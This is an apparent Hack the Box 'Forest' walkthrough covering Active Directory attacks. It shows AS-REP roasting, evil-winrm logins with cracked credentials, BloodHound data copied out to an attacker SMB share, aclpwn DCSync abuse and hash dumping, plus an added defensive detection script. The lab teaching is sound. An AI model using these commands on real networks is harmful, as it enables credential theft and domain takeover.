
Forest is a vulnerable Windows box that allows for some great practice with Windows Active Directory exploitation using Bloodhound; I wrote a complete tutorial on the subject.

As with all of the boxes, the name has a meaning; this one relates to Windows Active Directory forests.

Want to learn more ethical hacking? I highly recommend my book for beginners to pentesting, Become An Ethical Hacker. Check the price on Amazon.


Initial Enumeration

The target is running a few services and a few catch my eye. I try some Nmap vulnerability-check scripts against SMB, but to no surprise these are all fruitless.

That leaves a new opening to explore: port 5985 (WinRM) is open.

After running enum4linux as part of my SMB enumeration I see an account that looks like a service account. These kinds of accounts notoriously have weak passwords.

Kerberos Exploitation

I use Impacket's GetNPUsers.py to collect the AS-REP responses for accounts that do not require Kerberos pre-authentication. Part of each response is encrypted with a key derived from the user's password (for RC4, the NTLM hash itself), so it can be cracked offline.

By using an LDAP query you can grab a list of domain users that have Kerberos pre-authentication disabled (the "Do not require Kerberos preauthentication" account option).

GetNPUsers.py does both steps: it pulls that list from LDAP and then requests the non-preauth AS_REP responses from the KDC.

I had issues cracking the hash until I used the -w:/wordlist variant of the --wordlist flag; with that, the password for the account comes back as s3rvice.
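As an added example that is not part of the original write-up, here is the defender-side check for the weakness GetNPUsers.py leans on: the userAccountControl flag that disables pre-authentication, and the 4768 (TGT requested) events a domain controller logs when it hands out an AS-REP without it. The account list and log lines are constructed samples, and the flattened key=value layout of the log lines is my own rather than the native Windows event format.

```python
# Added example (not from the original write-up). Two checks a defender can run
# against the AS-REP roasting path described above:
#   1. audit userAccountControl for "Do not require Kerberos preauthentication"
#   2. alert on successful 4768 events whose Pre-Authentication Type is 0
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the bit GetNPUsers.py searches LDAP for

# Constructed sample of an LDAP search returning sAMAccountName + userAccountControl.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},  # no-preauth, pw never expires
    {"sAMAccountName": "sebastien", "userAccountControl": 0x10200},      # normal user
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400202},       # flag set but disabled
]

def asrep_roastable(accounts):
    """Enabled accounts with DONT_REQUIRE_PREAUTH set; the fix is clearing that bit."""
    return sorted(
        a["sAMAccountName"] for a in accounts
        if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
        and not a["userAccountControl"] & UF_ACCOUNTDISABLE
    )

# Constructed, flattened Security log lines (first field is the Event ID).
# PreAuthType 2 = PA-ENC-TIMESTAMP (normal); 0 = no pre-authentication at all.
SAMPLE_EVENTS = """\
4768 AccountName=svc-alfresco ClientAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Result=0x0
4768 AccountName=sebastien ClientAddress=::ffff:10.10.10.50 PreAuthType=2 TicketEncryptionType=0x12 Result=0x0
4768 AccountName=svc-alfresco ClientAddress=::ffff:10.10.14.5 PreAuthType=0 TicketEncryptionType=0x17 Result=0x0
4769 AccountName=sebastien ServiceName=krbtgt PreAuthType=2 TicketEncryptionType=0x12 Result=0x0
"""

def asrep_roast_alerts(log_text):
    """Group successful 4768 events with PreAuthType 0 by (account, client).
    RC4 (etype 0x17) makes the returned blob cheap to crack, so flag it too."""
    alerts = {}
    for line in log_text.splitlines():
        fields = line.split()
        if not fields or fields[0] != "4768":
            continue
        ev = dict(f.split("=", 1) for f in fields[1:])
        if ev.get("PreAuthType") != "0" or ev.get("Result") != "0x0":
            continue
        entry = alerts.setdefault((ev["AccountName"], ev["ClientAddress"]), {"count": 0, "rc4": False})
        entry["count"] += 1
        entry["rc4"] = entry["rc4"] or ev.get("TicketEncryptionType", "").lower() == "0x17"
    return alerts
```

Running both checks against the samples flags svc-alfresco in the audit and a repeated no-preauth RC4 AS-REP for that account from one client address in the log.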

HTB Forest: Evil-Winrm

The Windows Remote Management service is open and I now have credentials to test with, so I will use evil-winrm, a Ruby WinRM shell.

I install evil-winrm with gem install evil-winrm; the gem ends up under /var/lib/gems.

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice -s '/home/kali/ps1_scripts' -e '/usr/share/windows-binaries'

Privilege Escalation

You have a choice: do it manually or automatically with aclpwn.

You need PowerView.ps1; trust me, the linked version is the best one you will find.

You have to first start the neo4j database with neo4j console, then run aclpwn.

Don't miss this detail! You must specify the IP of the target or it will fail.

./.local/bin/aclpwn -du neo4j -dp neo4j1 -f svc-alfresco -ft user -d htb.local -s 10.10.10.161

Have to choose Path 0 or this will not work!

HTB Forest: Bloodhound

I would be remiss not to include a practical example from a great service, Hack the Box. I am using the Invoke-Bloodhound.ps1 script, which loads and executes in memory; only the collected zip output ends up on disk.

I am loading it in an evil-winrm shell, but you could upload the script and use it that way too.

Invoke-Bloodhound -CollectionMethod All -LDAPUser Svc-account -LDAPPass passw0rd

How Do I Move the Zip Back to Kali?

So you have the output of Invoke-Bloodhound.ps1, but how do you move it back to the Kali box? You can try Netcat, but what a pain in the ass; there is a better way.

That way is to start Impacket's smbserver.py on the Kali side (smbserver.py kali .) and then mount that share from the Windows target.

On the Windows side, mount the share (net use z: \\<kali-ip>\kali) and then copy *.zip z:

On the Kali side that activity shows up in the smbserver.py output.

It also helps to right-click a target in Bloodhound and mark it as owned, so the overall progression is evident.

My owned service account is part of the Exchange Windows Permissions group, which has WriteDacl on the domain object; that means I can add ACEs to domain objects.

What that means is that I can add a domain user to that group and grant it the DCSync (replication) rights for exploitation.

HTB Forest: ACLPwn Tutorial

These two tools go hand in hand. Aclpwn automatically reads the Bloodhound files and locates possible paths for exploitation. You can then use it to exploit the path you choose.

To run aclpwn you first have to start neo4j console; I usually also have to specify the database credentials.

Using secretsdump.py and the svc-alfresco account I now dump the password hashes for all the accounts in the domain.

Now I use evil-winrm again, this time with the Administrator's NTLM hash, to access the target for the final time.

That's it for the Hack the Box Forest walkthrough!